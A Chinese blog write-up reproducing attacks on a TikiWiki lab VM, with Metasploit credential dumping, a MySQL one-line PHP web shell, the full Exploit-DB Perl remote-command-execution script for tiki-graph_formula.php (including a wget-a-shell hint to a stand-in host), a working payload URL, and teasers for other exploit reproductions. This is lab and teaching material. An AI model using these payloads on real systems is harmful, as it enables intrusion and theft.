tiki-graph_formula.php代码执行漏洞复现(或许??)

1.不知道从哪里翻出来的虚拟机镜像(不知道甚么时候出现在磁盘里面的)

靶机镜像:https://pan.baidu.com/s/1ZgW8WaqXp8ULJbKCSgauFg

提取码: 1y8f

打开配置一下是tikiwiki这个东西

2.遇到陌生的玩意总是忍不住好奇心的,打开nikto扫描一下,发现有些奇怪的东西

本来没抱希望的,没想到还真扫描出来了,里面有一个phpinfo.php,一个phpMyAdmin,一个似乎是TikiWiki漏洞

3.Metasploit

打开msf,search一下tikiwiki

五个payload,逐个试

use auxiliary/admin/tikiwiki/tikidblib               #载入这个poc
set RHOSTS  192.168.5.129                            #靶机IP
show options                                         #看一下有没有错误
run                                                  #攻击

攻击成功?(嗯,确实成功了,未免有点简单过头了),这里拿到了数据库用户名密码,包括数据库名

4.phpMyAdmin

利用攻击获得的账户密码,登一下试试,登陆成功

5.getshell && mysql 写马

这里因为直接拿到root账户(Dba),因此可以直接往里面写一句话

写shell        INTO OUTFILE/DUMPFILE
SELECT ‘<?php eval($_POST[cmd]);?>‘ INTO OUTFILE ‘/var/www/tikiwiki/cmd.php‘;

试了下,写不进去,报错无法创建文件

打算日志备份写入,结果发现,如下图

wtf?,没有这个变量?

再看看有没有写入权限

SHOW VARIABLES LIKE ‘secure_file_priv‘;

摘自:https://blog.csdn.net/Auuuuuuuu/article/details/83690362

发现,可以写,但是NMD,为什么?

5.焦灼

phpMyAdmin3.0(exploit/unix/webapp/phpmyadmin_config)的漏洞也尝试了,无果。

后面再去翻nikto的扫描结果

这里明显是一个代码注入,可以执行phpinfo()

百度翻了老半天,问题就出在tiki-graph_formula.php这里,果然搜到一个exp

大致看了下

这里似乎是利用passthru()来进行命令执行

完整exp

链接地址:https://www.exploit-db.com/exploits/4525

#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands.
# The issue is due to ‘tiki-graph_formula.php‘ script not properly sanitizing user input
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR <sec [at] shankar.antichat.ru>
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $

use strict;
use LWP::UserAgent;

my $target = shift || &usage();
my $proxy = shift;
my $command;

&exploit($target, "cat db/local.php", $proxy);

print "[?] php shell it?\n";
print "[*] wget http://www.youhost.com/yourshell.txt -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

while()
{
	print "tiki\# ";
	chomp($command = <STDIN>);
	exit unless $command;
	&exploit($target, $command, $proxy);
}

sub usage()
{
	print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n";
	print "[?] str0ke <str0ke[!]milw0rm.com>\n";
	print "[?] usage: perl $0 [target]\n";
	print "    [target] (ex. http://127.0.0.1/tikiwiki)\n";
	print "    [proxy] (ex. 0.0.0.0:8080)\n";
	exit;
}

sub exploit()
{
	my($target, $command, $proxy) = @_;

	my $cmd = ‘echo start_er;‘.$command.‘;‘.‘echo end_er‘;

	my $byte = join(‘.‘, map { $_ = ‘chr(‘.$_.‘)‘ } unpack(‘C*‘, $cmd));

	my $conn = LWP::UserAgent->new() or die;
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy;

	my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");

	if ($out->content =~ m/start_er(.*?)end_er/ms) {
		print $1 . "\n";
	} else {
		print "[-] Exploit Failed\n";
		exit;
	}
}

# milw0rm.com [2007-10-12]

7.Getshell

存在代码执行漏洞,那么,修改一下payload

http://192.168.5.129//tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(‘whoami‘).die()&t=png&title=http://cirt.net/rfiinc.txt

有一个问题,就是这里只能执行单个命令,输入带参数的命令的话,个人觉得应该把命令转化为比特流(exp上大致也是这么处理的)

最后补上,这个模块我在msf上面找到了

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution

原文地址:https://www.cnblogs.com/mke2fs/p/11650754.html

时间: 2024-11-08 07:44:26

tiki-graph_formula.php代码执行漏洞复现(或许??)的相关文章

WinRAR代码执行漏洞复现

漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为<Extracting a 19 Year old code Execution from WinRAR>的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行. 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触

Office CVE-2017-8570远程代码执行漏洞复现

实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程,团队合作. 实验内容 Office CVE-2017-8570 CVE-2017-8570漏

ECShop全系列版本远程代码执行漏洞复现

前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_REFERER,我们可控. assign函数用于在模版变量里赋值 再看display函数 读取user_passport.dwt模版文件内容,显示解析变量后的html内容,用_echash做分割,得到$k然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$val内容可随

Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析

0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER,我们可控. 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容,显示解析变量后的HTML内容,用_echash做分割,得到$?然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$ VAL内容可随意控制

LNK文件(快捷方式)远程代码执行漏洞复现过程(CVE-2017-8464)

漏洞编号:CVE-2017-8464 漏洞等级:严重 漏洞概要:如果用户打开攻击者精心构造的恶意LNK文件,则会造成远程代码执行.成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限. 攻击者可以通过可移动驱动器(U盘)或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户.当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时,与之关联的恶意二进制代码将在目标系统上执行. 受影响版本 桌面系统:Windows 10, 7, 8.1, 8, V

CVE-2017-7269 IIS6.0远程代码执行漏洞复现

一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三.漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve-2017-7269 IIS6.exe提权工具 3389.bat 四.漏洞复现 1.IIS开启Web

Office CVE-2017-8570 远程代码执行漏洞复现

最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应. 0x00介绍CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化"script"Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件.攻击者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广.0X01影响版本M

WinRAR 代码执行漏洞复现

影响版本: WinRAR < 5.70 Beta 1 Bandizip    < = 6.2.0.0 好压(2345压缩)    < = 5.9.8.10907 360压缩    < = 4.0.0.1170 测试版本:WinRAR 5.61 工具地址:https://github.com/droe/acefile 010 Editor.WinAce 复现: 创建一个 sch01ar.txt 右键 点击 Add to 选择 store full path,然后点击 Add 先用 a

CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

0x01 2019年9月7日凌晨,msf上更新了0708的漏洞利用程序. 顿时安全群和朋友圈就爆炸了 - 奈何接到HW攻击队任务,又在家过了个中秋,0708才在今天更新. 0x02 环境 Windows 7 sp1 Kali exp 0x02 利用 1.一键安装metasploit-framework curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploi